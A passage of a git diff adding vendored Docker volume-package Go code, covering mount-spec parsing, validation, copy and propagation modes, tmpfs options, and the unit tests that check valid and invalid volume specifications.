+		{mount.Mount{Type: mount.TypeBind, Target: testDestinationPath, Source: testSourcePath, VolumeOptions: &mount.VolumeOptions{}}, errExtraField("VolumeOptions")},
+		{mount.Mount{Type: mount.TypeBind, Source: testSourcePath, Target: testDestinationPath}, errBindNotExist},
+		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath}, nil},
+		{mount.Mount{Type: "invalid", Target: testDestinationPath}, errors.New("mount type unknown")},
+	}
+	for i, x := range cases {
+		err := validateMountConfig(&x.input)
+		if err == nil && x.expected == nil {
+			continue
+		}
+		if (err == nil && x.expected != nil) || (x.expected == nil && err != nil) || !strings.Contains(err.Error(), x.expected.Error()) {
+			t.Fatalf("expected %q, got %q, case: %d", x.expected, err, i)
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/validate_test_unix.go b/vendor/github.com/docker/docker/volume/validate_test_unix.go
new file mode 100644
index 0000000000..dd1de2f643
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/validate_test_unix.go
@@ -0,0 +1,8 @@
+// +build !windows
+
+package volume
+
+var (
+	testDestinationPath = "/foo"
+	testSourcePath      = "/foo"
+)
diff --git a/vendor/github.com/docker/docker/volume/validate_test_windows.go b/vendor/github.com/docker/docker/volume/validate_test_windows.go
new file mode 100644
index 0000000000..d5f86ac850
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/validate_test_windows.go
@@ -0,0 +1,6 @@
+package volume
+
+var (
+	testDestinationPath = `c:\foo`
+	testSourcePath      = `c:\foo`
+)
diff --git a/vendor/github.com/docker/docker/volume/volume.go b/vendor/github.com/docker/docker/volume/volume.go
new file mode 100644
index 0000000000..f3227fe485
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume.go
@@ -0,0 +1,323 @@
+package volume
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+	"syscall"
+
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/pkg/idtools"
+	"github.com/docker/docker/pkg/stringid"
+	"github.com/opencontainers/runc/libcontainer/label"
+	"github.com/pkg/errors"
+)
+
+// DefaultDriverName is the driver name used for the driver
+// implemented in the local package.
+const DefaultDriverName = "local"
+
+// Scopes define if a volume has is cluster-wide (global) or local only.
+// Scopes are returned by the volume driver when it is queried for capabilities and then set on a volume
+const (
+	LocalScope  = "local"
+	GlobalScope = "global"
+)
+
+// Driver is for creating and removing volumes.
+type Driver interface {
+	// Name returns the name of the volume driver.
+	Name() string
+	// Create makes a new volume with the given id.
+	Create(name string, opts map[string]string) (Volume, error)
+	// Remove deletes the volume.
+	Remove(vol Volume) (err error)
+	// List lists all the volumes the driver has
+	List() ([]Volume, error)
+	// Get retrieves the volume with the requested name
+	Get(name string) (Volume, error)
+	// Scope returns the scope of the driver (e.g. `global` or `local`).
+	// Scope determines how the driver is handled at a cluster level
+	Scope() string
+}
+
+// Capability defines a set of capabilities that a driver is able to handle.
+type Capability struct {
+	// Scope is the scope of the driver, `global` or `local`
+	// A `global` scope indicates that the driver manages volumes across the cluster
+	// A `local` scope indicates that the driver only manages volumes resources local to the host
+	// Scope is declared by the driver
+	Scope string
+}
+
+// Volume is a place to store data. It is backed by a specific driver, and can be mounted.
+type Volume interface {
+	// Name returns the name of the volume
+	Name() string
+	// DriverName returns the name of the driver which owns this volume.
+	DriverName() string
+	// Path returns the absolute path to the volume.
+	Path() string
+	// Mount mounts the volume and returns the absolute path to
+	// where it can be consumed.
+	Mount(id string) (string, error)
+	// Unmount unmounts the volume when it is no longer in use.
+	Unmount(id string) error
+	// Status returns low-level status information about a volume
+	Status() map[string]interface{}
+}
+
+// DetailedVolume wraps a Volume with user-defined labels, options, and cluster scope (e.g., `local` or `global`)
+type DetailedVolume interface {
+	Labels() map[string]string
+	Options() map[string]string
+	Scope() string
+	Volume
+}
+
+// MountPoint is the intersection point between a volume and a container. It
+// specifies which volume is to be used and where inside a container it should
+// be mounted.
+type MountPoint struct {
+	// Source is the source path of the mount.
+	// E.g. `mount --bind /foo /bar`, `/foo` is the `Source`.
+	Source string
+	// Destination is the path relative to the container root (`/`) to the mount point
+	// It is where the `Source` is mounted to
+	Destination string
+	// RW is set to true when the mountpoint should be mounted as read-write
+	RW bool
+	// Name is the name reference to the underlying data defined by `Source`
+	// e.g., the volume name
+	Name string
+	// Driver is the volume driver used to create the volume (if it is a volume)
+	Driver string
+	// Type of mount to use, see `Type<foo>` definitions in github.com/docker/docker/api/types/mount
+	Type mounttypes.Type `json:",omitempty"`
+	// Volume is the volume providing data to this mountpoint.
+	// This is nil unless `Type` is set to `TypeVolume`
+	Volume Volume `json:"-"`
+
+	// Mode is the comma separated list of options supplied by the user when creating
+	// the bind/volume mount.
+	// Note Mode is not used on Windows
+	Mode string `json:"Relabel,omitempty"` // Originally field was `Relabel`"
+
+	// Propagation describes how the mounts are propagated from the host into the
+	// mount point, and vice-versa.
+	// See https://www.kernel.org/doc/Documentation/filesystems/sharedsubtree.txt
+	// Note Propagation is not used on Windows
+	Propagation mounttypes.Propagation `json:",omitempty"` // Mount propagation string
+
+	// Specifies if data should be copied from the container before the first mount
+	// Use a pointer here so we can tell if the user set this value explicitly
+	// This allows us to error out when the user explicitly enabled copy but we can't copy due to the volume being populated
+	CopyData bool `json:"-"`
+	// ID is the opaque ID used to pass to the volume driver.
+	// This should be set by calls to `Mount` and unset by calls to `Unmount`
+	ID string `json:",omitempty"`
+
+	// Sepc is a copy of the API request that created this mount.
+	Spec mounttypes.Mount
+}
+
+// Setup sets up a mount point by either mounting the volume if it is
+// configured, or creating the source directory if supplied.
+func (m *MountPoint) Setup(mountLabel string, rootUID, rootGID int) (string, error) {
+	if m.Volume != nil {
+		id := m.ID
+		if id == "" {
+			id = stringid.GenerateNonCryptoID()
+		}
+		path, err := m.Volume.Mount(id)
+		if err != nil {
+			return "", errors.Wrapf(err, "error while mounting volume '%s'", m.Source)
+		}
+		m.ID = id
+		return path, nil
+	}
+	if len(m.Source) == 0 {
+		return "", fmt.Errorf("Unable to setup mount point, neither source nor volume defined")
+	}
+	// system.MkdirAll() produces an error if m.Source exists and is a file (not a directory),
+	if m.Type == mounttypes.TypeBind {
+		// idtools.MkdirAllNewAs() produces an error if m.Source exists and is a file (not a directory)
+		// also, makes sure that if the directory is created, the correct remapped rootUID/rootGID will own it
+		if err := idtools.MkdirAllNewAs(m.Source, 0755, rootUID, rootGID); err != nil {
+			if perr, ok := err.(*os.PathError); ok {
+				if perr.Err != syscall.ENOTDIR {
+					return "", errors.Wrapf(err, "error while creating mount source path '%s'", m.Source)
+				}
+			}
+		}
+	}
+	if label.RelabelNeeded(m.Mode) {
+		if err := label.Relabel(m.Source, mountLabel, label.IsShared(m.Mode)); err != nil {
+			return "", errors.Wrapf(err, "error setting label on mount source '%s'", m.Source)
+		}
+	}
+	return m.Source, nil
+}
+
+// Path returns the path of a volume in a mount point.
+func (m *MountPoint) Path() string {
+	if m.Volume != nil {
+		return m.Volume.Path()
+	}
+	return m.Source
+}
+
+// ParseVolumesFrom ensures that the supplied volumes-from is valid.
+func ParseVolumesFrom(spec string) (string, string, error) {
+	if len(spec) == 0 {
+		return "", "", fmt.Errorf("volumes-from specification cannot be an empty string")
+	}
+
+	specParts := strings.SplitN(spec, ":", 2)
+	id := specParts[0]
+	mode := "rw"
+
+	if len(specParts) == 2 {
+		mode = specParts[1]
+		if !ValidMountMode(mode) {
+			return "", "", errInvalidMode(mode)
+		}
+		// For now don't allow propagation properties while importing
+		// volumes from data container. These volumes will inherit
+		// the same propagation property as of the original volume
+		// in data container. This probably can be relaxed in future.
+		if HasPropagation(mode) {
+			return "", "", errInvalidMode(mode)
+		}
+		// Do not allow copy modes on volumes-from
+		if _, isSet := getCopyMode(mode); isSet {
+			return "", "", errInvalidMode(mode)
+		}
+	}
+	return id, mode, nil
+}
+
+// ParseMountRaw parses a raw volume spec (e.g. `-v /foo:/bar:shared`) into a
+// structured spec. Once the raw spec is parsed it relies on `ParseMountSpec` to
+// validate the spec and create a MountPoint
+func ParseMountRaw(raw, volumeDriver string) (*MountPoint, error) {
+	arr, err := splitRawSpec(convertSlash(raw))
+	if err != nil {
+		return nil, err
+	}
+
+	var spec mounttypes.Mount
+	var mode string
+	switch len(arr) {
+	case 1:
+		// Just a destination path in the container
+		spec.Target = arr[0]
+	case 2:
+		if ValidMountMode(arr[1]) {
+			// Destination + Mode is not a valid volume - volumes
+			// cannot include a mode. eg /foo:rw
+			return nil, errInvalidSpec(raw)
+		}
+		// Host Source Path or Name + Destination
+		spec.Source = arr[0]
+		spec.Target = arr[1]
+	case 3:
+		// HostSourcePath+DestinationPath+Mode
+		spec.Source = arr[0]
+		spec.Target = arr[1]
+		mode = arr[2]
+	default:
+		return nil, errInvalidSpec(raw)
+	}
+
+	if !ValidMountMode(mode) {
+		return nil, errInvalidMode(mode)
+	}
+
+	if filepath.IsAbs(spec.Source) {
+		spec.Type = mounttypes.TypeBind
+	} else {
+		spec.Type = mounttypes.TypeVolume
+	}
+
+	spec.ReadOnly = !ReadWrite(mode)
+
+	// cannot assume that if a volume driver is passed in that we should set it
+	if volumeDriver != "" && spec.Type == mounttypes.TypeVolume {
+		spec.VolumeOptions = &mounttypes.VolumeOptions{
+			DriverConfig: &mounttypes.Driver{Name: volumeDriver},
+		}
+	}
+
+	if copyData, isSet := getCopyMode(mode); isSet {
+		if spec.VolumeOptions == nil {
+			spec.VolumeOptions = &mounttypes.VolumeOptions{}
+		}
+		spec.VolumeOptions.NoCopy = !copyData
+	}
+	if HasPropagation(mode) {
+		spec.BindOptions = &mounttypes.BindOptions{
+			Propagation: GetPropagation(mode),
+		}
+	}
+
+	mp, err := ParseMountSpec(spec, platformRawValidationOpts...)
+	if mp != nil {
+		mp.Mode = mode
+	}
+	if err != nil {
+		err = fmt.Errorf("%v: %v", errInvalidSpec(raw), err)
+	}
+	return mp, err
+}
+
+// ParseMountSpec reads a mount config, validates it, and configures a mountpoint from it.
+func ParseMountSpec(cfg mounttypes.Mount, options ...func(*validateOpts)) (*MountPoint, error) {
+	if err := validateMountConfig(&cfg, options...); err != nil {
+		return nil, err
+	}
+	mp := &MountPoint{
+		RW:          !cfg.ReadOnly,
+		Destination: clean(convertSlash(cfg.Target)),
+		Type:        cfg.Type,
+		Spec:        cfg,
+	}
+
+	switch cfg.Type {
+	case mounttypes.TypeVolume:
+		if cfg.Source == "" {
+			mp.Name = stringid.GenerateNonCryptoID()
+		} else {
+			mp.Name = cfg.Source
+		}
+		mp.CopyData = DefaultCopyMode
+
+		if cfg.VolumeOptions != nil {
+			if cfg.VolumeOptions.DriverConfig != nil {
+				mp.Driver = cfg.VolumeOptions.DriverConfig.Name
+			}
+			if cfg.VolumeOptions.NoCopy {
+				mp.CopyData = false
+			}
+		}
+	case mounttypes.TypeBind:
+		mp.Source = clean(convertSlash(cfg.Source))
+		if cfg.BindOptions != nil {
+			if len(cfg.BindOptions.Propagation) > 0 {
+				mp.Propagation = cfg.BindOptions.Propagation
+			}
+		}
+	case mounttypes.TypeTmpfs:
+		// NOP
+	}
+	return mp, nil
+}
+
+func errInvalidMode(mode string) error {
+	return fmt.Errorf("invalid mode: %v", mode)
+}
+
+func errInvalidSpec(spec string) error {
+	return fmt.Errorf("invalid volume specification: '%s'", spec)
+}
diff --git a/vendor/github.com/docker/docker/volume/volume_copy.go b/vendor/github.com/docker/docker/volume/volume_copy.go
new file mode 100644
index 0000000000..77f06a0d1f
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_copy.go
@@ -0,0 +1,23 @@
+package volume
+
+import "strings"
+
+// {<copy mode>=isEnabled}
+var copyModes = map[string]bool{
+	"nocopy": false,
+}
+
+func copyModeExists(mode string) bool {
+	_, exists := copyModes[mode]
+	return exists
+}
+
+// GetCopyMode gets the copy mode from the mode string for mounts
+func getCopyMode(mode string) (bool, bool) {
+	for _, o := range strings.Split(mode, ",") {
+		if isEnabled, exists := copyModes[o]; exists {
+			return isEnabled, true
+		}
+	}
+	return DefaultCopyMode, false
+}
diff --git a/vendor/github.com/docker/docker/volume/volume_copy_unix.go b/vendor/github.com/docker/docker/volume/volume_copy_unix.go
new file mode 100644
index 0000000000..ad66e17637
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_copy_unix.go
@@ -0,0 +1,8 @@
+// +build !windows
+
+package volume
+
+const (
+	// DefaultCopyMode is the copy mode used by default for normal/named volumes
+	DefaultCopyMode = true
+)
diff --git a/vendor/github.com/docker/docker/volume/volume_copy_windows.go b/vendor/github.com/docker/docker/volume/volume_copy_windows.go
new file mode 100644
index 0000000000..798638c878
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_copy_windows.go
@@ -0,0 +1,6 @@
+package volume
+
+const (
+	// DefaultCopyMode is the copy mode used by default for normal/named volumes
+	DefaultCopyMode = false
+)
diff --git a/vendor/github.com/docker/docker/volume/volume_linux.go b/vendor/github.com/docker/docker/volume/volume_linux.go
new file mode 100644
index 0000000000..d4b4d800b2
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_linux.go
@@ -0,0 +1,56 @@
+// +build linux
+
+package volume
+
+import (
+	"fmt"
+	"strings"
+
+	mounttypes "github.com/docker/docker/api/types/mount"
+)
+
+// ConvertTmpfsOptions converts *mounttypes.TmpfsOptions to the raw option string
+// for mount(2).
+func ConvertTmpfsOptions(opt *mounttypes.TmpfsOptions, readOnly bool) (string, error) {
+	var rawOpts []string
+	if readOnly {
+		rawOpts = append(rawOpts, "ro")
+	}
+
+	if opt != nil && opt.Mode != 0 {
+		rawOpts = append(rawOpts, fmt.Sprintf("mode=%o", opt.Mode))
+	}
+
+	if opt != nil && opt.SizeBytes != 0 {
+		// calculate suffix here, making this linux specific, but that is
+		// okay, since API is that way anyways.
+
+		// we do this by finding the suffix that divides evenly into the
+		// value, returing the value itself, with no suffix, if it fails.
+		//
+		// For the most part, we don't enforce any semantic to this values.
+		// The operating system will usually align this and enforce minimum
+		// and maximums.
+		var (
+			size   = opt.SizeBytes
+			suffix string
+		)
+		for _, r := range []struct {
+			suffix  string
+			divisor int64
+		}{
+			{"g", 1 << 30},
+			{"m", 1 << 20},
+			{"k", 1 << 10},
+		} {
+			if size%r.divisor == 0 {
+				size = size / r.divisor
+				suffix = r.suffix
+				break
+			}
+		}
+
+		rawOpts = append(rawOpts, fmt.Sprintf("size=%d%s", size, suffix))
+	}
+	return strings.Join(rawOpts, ","), nil
+}
diff --git a/vendor/github.com/docker/docker/volume/volume_linux_test.go b/vendor/github.com/docker/docker/volume/volume_linux_test.go
new file mode 100644
index 0000000000..40ce5525a3
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_linux_test.go
@@ -0,0 +1,51 @@
+// +build linux
+
+package volume
+
+import (
+	"strings"
+	"testing"
+
+	mounttypes "github.com/docker/docker/api/types/mount"
+)
+
+func TestConvertTmpfsOptions(t *testing.T) {
+	type testCase struct {
+		opt                  mounttypes.TmpfsOptions
+		readOnly             bool
+		expectedSubstrings   []string
+		unexpectedSubstrings []string
+	}
+	cases := []testCase{
+		{
+			opt:                  mounttypes.TmpfsOptions{SizeBytes: 1024 * 1024, Mode: 0700},
+			readOnly:             false,
+			expectedSubstrings:   []string{"size=1m", "mode=700"},
+			unexpectedSubstrings: []string{"ro"},
+		},
+		{
+			opt:                  mounttypes.TmpfsOptions{},
+			readOnly:             true,
+			expectedSubstrings:   []string{"ro"},
+			unexpectedSubstrings: []string{},
+		},
+	}
+	for _, c := range cases {
+		data, err := ConvertTmpfsOptions(&c.opt, c.readOnly)
+		if err != nil {
+			t.Fatalf("could not convert %+v (readOnly: %v) to string: %v",
+				c.opt, c.readOnly, err)
+		}
+		t.Logf("data=%q", data)
+		for _, s := range c.expectedSubstrings {
+			if !strings.Contains(data, s) {
+				t.Fatalf("expected substring: %s, got %v (case=%+v)", s, data, c)
+			}
+		}
+		for _, s := range c.unexpectedSubstrings {
+			if strings.Contains(data, s) {
+				t.Fatalf("unexpected substring: %s, got %v (case=%+v)", s, data, c)
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux.go
new file mode 100644
index 0000000000..1de57ab52b
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_propagation_linux.go
@@ -0,0 +1,47 @@
+// +build linux
+
+package volume
+
+import (
+	"strings"
+
+	mounttypes "github.com/docker/docker/api/types/mount"
+)
+
+// DefaultPropagationMode defines what propagation mode should be used by
+// default if user has not specified one explicitly.
+// propagation modes
+const DefaultPropagationMode = mounttypes.PropagationRPrivate
+
+var propagationModes = map[mounttypes.Propagation]bool{
+	mounttypes.PropagationPrivate:  true,
+	mounttypes.PropagationRPrivate: true,
+	mounttypes.PropagationSlave:    true,
+	mounttypes.PropagationRSlave:   true,
+	mounttypes.PropagationShared:   true,
+	mounttypes.PropagationRShared:  true,
+}
+
+// GetPropagation extracts and returns the mount propagation mode. If there
+// are no specifications, then by default it is "private".
+func GetPropagation(mode string) mounttypes.Propagation {
+	for _, o := range strings.Split(mode, ",") {
+		prop := mounttypes.Propagation(o)
+		if propagationModes[prop] {
+			return prop
+		}
+	}
+	return DefaultPropagationMode
+}
+
+// HasPropagation checks if there is a valid propagation mode present in
+// passed string. Returns true if a valid propagation mode specifier is
+// present, false otherwise.
+func HasPropagation(mode string) bool {
+	for _, o := range strings.Split(mode, ",") {
+		if propagationModes[mounttypes.Propagation(o)] {
+			return true
+		}
+	}
+	return false
+}
diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go b/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go
new file mode 100644
index 0000000000..46d0265062
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_propagation_linux_test.go
@@ -0,0 +1,65 @@
+// +build linux
+
+package volume
+
+import (
+	"strings"
+	"testing"
+)
+
+func TestParseMountRawPropagation(t *testing.T) {
+	var (
+		valid   []string
+		invalid map[string]string
+	)
+
+	valid = []string{
+		"/hostPath:/containerPath:shared",
+		"/hostPath:/containerPath:rshared",
+		"/hostPath:/containerPath:slave",
+		"/hostPath:/containerPath:rslave",
+		"/hostPath:/containerPath:private",
+		"/hostPath:/containerPath:rprivate",
+		"/hostPath:/containerPath:ro,shared",
+		"/hostPath:/containerPath:ro,slave",
+		"/hostPath:/containerPath:ro,private",
+		"/hostPath:/containerPath:ro,z,shared",
+		"/hostPath:/containerPath:ro,Z,slave",
+		"/hostPath:/containerPath:Z,ro,slave",
+		"/hostPath:/containerPath:slave,Z,ro",
+		"/hostPath:/containerPath:Z,slave,ro",
+		"/hostPath:/containerPath:slave,ro,Z",
+		"/hostPath:/containerPath:rslave,ro,Z",
+		"/hostPath:/containerPath:ro,rshared,Z",
+		"/hostPath:/containerPath:ro,Z,rprivate",
+	}
+	invalid = map[string]string{
+		"/path:/path:ro,rshared,rslave":   `invalid mode`,
+		"/path:/path:ro,z,rshared,rslave": `invalid mode`,
+		"/path:shared":                    "invalid volume specification",
+		"/path:slave":                     "invalid volume specification",
+		"/path:private":                   "invalid volume specification",
+		"name:/absolute-path:shared":      "invalid volume specification",
+		"name:/absolute-path:rshared":     "invalid volume specification",
+		"name:/absolute-path:slave":       "invalid volume specification",
+		"name:/absolute-path:rslave":      "invalid volume specification",
+		"name:/absolute-path:private":     "invalid volume specification",
+		"name:/absolute-path:rprivate":    "invalid volume specification",
+	}
+
+	for _, path := range valid {
+		if _, err := ParseMountRaw(path, "local"); err != nil {
+			t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err)
+		}
+	}
+
+	for path, expectedError := range invalid {
+		if _, err := ParseMountRaw(path, "local"); err == nil {
+			t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err %v", path, err)
+		} else {
+			if !strings.Contains(err.Error(), expectedError) {
+				t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error())
+			}
+		}
+	}
+}
diff --git a/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go b/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go
new file mode 100644
index 0000000000..7311ffc2e0
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_propagation_unsupported.go
@@ -0,0 +1,24 @@
+// +build !linux
+
+package volume
+
+import mounttypes "github.com/docker/docker/api/types/mount"
+
+// DefaultPropagationMode is used only in linux. In other cases it returns
+// empty string.
+const DefaultPropagationMode mounttypes.Propagation = ""
+
+// propagation modes not supported on this platform.
+var propagationModes = map[mounttypes.Propagation]bool{}
+
+// GetPropagation is not supported. Return empty string.
+func GetPropagation(mode string) mounttypes.Propagation {
+	return DefaultPropagationMode
+}
+
+// HasPropagation checks if there is a valid propagation mode present in
+// passed string. Returns true if a valid propagation mode specifier is
+// present, false otherwise.
+func HasPropagation(mode string) bool {
+	return false
+}
diff --git a/vendor/github.com/docker/docker/volume/volume_test.go b/vendor/github.com/docker/docker/volume/volume_test.go
new file mode 100644
index 0000000000..54df38053f
--- /dev/null
+++ b/vendor/github.com/docker/docker/volume/volume_test.go
@@ -0,0 +1,269 @@
+package volume
+
+import (
+	"io/ioutil"
+	"os"
+	"runtime"
+	"strings"
+	"testing"
+
+	"github.com/docker/docker/api/types/mount"
+)
+
+func TestParseMountRaw(t *testing.T) {
+	var (
+		valid   []string
+		invalid map[string]string
+	)
+
+	if runtime.GOOS == "windows" {
+		valid = []string{
+			`d:\`,
+			`d:`,
+			`d:\path`,
+			`d:\path with space`,
+			// TODO Windows post TP5 - readonly support `d:\pathandmode:ro`,
+			`c:\:d:\`,
+			`c:\windows\:d:`,
+			`c:\windows:d:\s p a c e`,
+			`c:\windows:d:\s p a c e:RW`,
+			`c:\program files:d:\s p a c e i n h o s t d i r`,
+			`0123456789name:d:`,
+			`MiXeDcAsEnAmE:d:`,
+			`name:D:`,
+			`name:D::rW`,
+			`name:D::RW`,
+			// TODO Windows post TP5 - readonly support `name:D::RO`,
+			`c:/:d:/forward/slashes/are/good/too`,
+			// TODO Windows post TP5 - readonly support `c:/:d:/including with/spaces:ro`,
+			`c:\Windows`,             // With capital
+			`c:\Program Files (x86)`, // With capitals and brackets
+		}
+		invalid = map[string]string{
+			``:                                 "invalid volume specification: ",
+			`.`:                                "invalid volume specification: ",
+			`..\`:                              "invalid volume specification: ",
+			`c:\:..\`:                          "invalid volume specification: ",
+			`c:\:d:\:xyzzy`:                    "invalid volume specification: ",
+			`c:`:                               "cannot be `c:`",
+			`c:\`:                              "cannot be `c:`",
+			`c:\notexist:d:`:                   `source path does not exist`,
+			`c:\windows\system32\ntdll.dll:d:`: `source path must be a directory`,
+			`name<:d:`:                         `invalid volume specification`,
+			`name>:d:`:                         `invalid volume specification`,
+			`name::d:`:                         `invalid volume specification`,
+			`name":d:`:                         `invalid volume specification`,
+			`name\:d:`:                         `invalid volume specification`,
+			`name*:d:`:                         `invalid volume specification`,
+			`name|:d:`:                         `invalid volume specification`,
+			`name?:d:`:                         `invalid volume specification`,
+			`name/:d:`:                         `invalid volume specification`,
+			`d:\pathandmode:rw`:                `invalid volume specification`,
+			`con:d:`:                           `cannot be a reserved word for Windows filenames`,
+			`PRN:d:`:                           `cannot be a reserved word for Windows filenames`,
+			`aUx:d:`:                           `cannot be a reserved word for Windows filenames`,
+			`nul:d:`:                           `cannot be a reserved word for Windows filenames`,
+			`com1:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com2:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com3:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com4:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com5:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com6:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com7:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com8:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`com9:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt1:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt2:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt3:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt4:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt5:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt6:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt7:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt8:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`lpt9:d:`:                          `cannot be a reserved word for Windows filenames`,
+			`c:\windows\system32\ntdll.dll`:    `Only directories can be mapped on this platform`,
+		}
+
+	} else {
+		valid = []string{
+			"/home",
+			"/home:/home",
+			"/home:/something/else",
+			"/with space",
+			"/home:/with space",
+			"relative:/absolute-path",
+			"hostPath:/containerPath:ro",
+			"/hostPath:/containerPath:rw",
+			"/rw:/ro",
+		}
+		invalid = map[string]string{
+			"":                "invalid volume specification",
+			"./":              "mount path must be absolute",
+			"../":             "mount path must be absolute",
+			"/:../":           "mount path must be absolute",
+			"/:path":          "mount path must be absolute",
+			":":               "invalid volume specification",
+			"/tmp:":           "invalid volume specification",
+			":test":           "invalid volume specification",
+			":/test":          "invalid volume specification",
+			"tmp:":            "invalid volume specification",
+			":test:":          "invalid volume specification",
+			"::":              "invalid volume specification",
+			":::":             "invalid volume specification",
+			"/tmp:::":         "invalid volume specification",
+			":/tmp::":         "invalid volume specification",
+			"/path:rw":        "invalid volume specification",
+			"/path:ro":        "invalid volume specification",
+			"/rw:rw":          "invalid volume specification",
+			"path:ro":         "invalid volume specification",
+			"/path:/path:sw":  `invalid mode`,
+			"/path:/path:rwz": `invalid mode`,
+		}
+	}
+
+	for _, path := range valid {
+		if _, err := ParseMountRaw(path, "local"); err != nil {
+			t.Fatalf("ParseMountRaw(`%q`) should succeed: error %q", path, err)
+		}
+	}
+
+	for path, expectedError := range invalid {
+		if mp, err := ParseMountRaw(path, "local"); err == nil {
+			t.Fatalf("ParseMountRaw(`%q`) should have failed validation. Err '%v' - MP: %v", path, err, mp)
+		} else {
+			if !strings.Contains(err.Error(), expectedError) {
+				t.Fatalf("ParseMountRaw(`%q`) error should contain %q, got %v", path, expectedError, err.Error())
+			}
+		}
+	}
+}
+
+// testParseMountRaw is a structure used by TestParseMountRawSplit for
+// specifying test cases for the ParseMountRaw() function.
+type testParseMountRaw struct {
+	bind      string
+	driver    string
+	expDest   string
+	expSource string
+	expName   string
+	expDriver string
+	expRW     bool
+	fail      bool
+}
+
+func TestParseMountRawSplit(t *testing.T) {
+	var cases []testParseMountRaw
+	if runtime.GOOS == "windows" {
+		cases = []testParseMountRaw{
+			{`c:\:d:`, "local", `d:`, `c:\`, ``, "", true, false},
+			{`c:\:d:\`, "local", `d:\`, `c:\`, ``, "", true, false},
+			// TODO Windows post TP5 - Add readonly support {`c:\:d:\:ro`, "local", `d:\`, `c:\`, ``, "", false, false},
+			{`c:\:d:\:rw`, "local", `d:\`, `c:\`, ``, "", true, false},
+			{`c:\:d:\:foo`, "local", `d:\`, `c:\`, ``, "", false, true},
+			{`name:d::rw`, "local", `d:`, ``, `name`, "local", true, false},
+			{`name:d:`, "local", `d:`, ``, `name`, "local", true, false},
+			// TODO Windows post TP5 - Add readonly support {`name:d::ro`, "local", `d:`, ``, `name`, "local", false, false},
+			{`name:c:`, "", ``, ``, ``, "", true, true},
+			{`driver/name:c:`, "", ``, ``, ``, "", true, true},
+		}
+	} else {
+		cases = []testParseMountRaw{
+			{"/tmp:/tmp1", "", "/tmp1", "/tmp", "", "", true, false},
+			{"/tmp:/tmp2:ro", "", "/tmp2", "/tmp", "", "", false, false},
+			{"/tmp:/tmp3:rw", "", "/tmp3", "/tmp", "", "", true, false},
+			{"/tmp:/tmp4:foo", "", "", "", "", "", false, true},
+			{"name:/named1", "", "/named1", "", "name", "", true, false},
+			{"name:/named2", "external", "/named2", "", "name", "external", true, false},
+			{"name:/named3:ro", "local", "/named3", "", "name", "local", false, false},
+			{"local/name:/tmp:rw", "", "/tmp", "", "local/name", "", true, false},
+			{"/tmp:tmp", "", "", "", "", "", true, true},
+		}
+	}
+
+	for i, c := range cases {
+		t.Logf("case %d", i)
+		m, err := ParseMountRaw(c.bind, c.driver)
+		if c.fail {
+			if err == nil {
+				t.Fatalf("Expected error, was nil, for spec %s\n", c.bind)
+			}
+			continue
+		}
+
+		if m == nil || err != nil {
+			t.Fatalf("ParseMountRaw failed for spec '%s', driver '%s', error '%v'", c.bind, c.driver, err.Error())
+			continue
+		}
+
+		if m.Destination != c.expDest {
+			t.Fatalf("Expected destination '%s, was %s', for spec '%s'", c.expDest, m.Destination, c.bind)
+		}
+
+		if m.Source != c.expSource {
+			t.Fatalf("Expected source '%s', was '%s', for spec '%s'", c.expSource, m.Source, c.bind)
+		}
+
+		if m.Name != c.expName {
+			t.Fatalf("Expected name '%s', was '%s' for spec '%s'", c.expName, m.Name, c.bind)
+		}
+
+		if m.Driver != c.expDriver {
+			t.Fatalf("Expected driver '%s', was '%s', for spec '%s'", c.expDriver, m.Driver, c.bind)
+		}
+
+		if m.RW != c.expRW {
+			t.Fatalf("Expected RW '%v', was '%v' for spec '%s'", c.expRW, m.RW, c.bind)
+		}
+	}
+}
+
+func TestParseMountSpec(t *testing.T) {
+	type c struct {
+		input    mount.Mount
+		expected MountPoint
+	}
+	testDir, err := ioutil.TempDir("", "test-mount-config")
+	if err != nil {
+		t.Fatal(err)
+	}
+	defer os.RemoveAll(testDir)
+
+	cases := []c{
+		{mount.Mount{Type: mount.TypeBind, Source: testDir, Target: testDestinationPath, ReadOnly: true}, MountPoint{Type: mount.TypeBind, Source: testDir, Destination: testDestinationPath}},
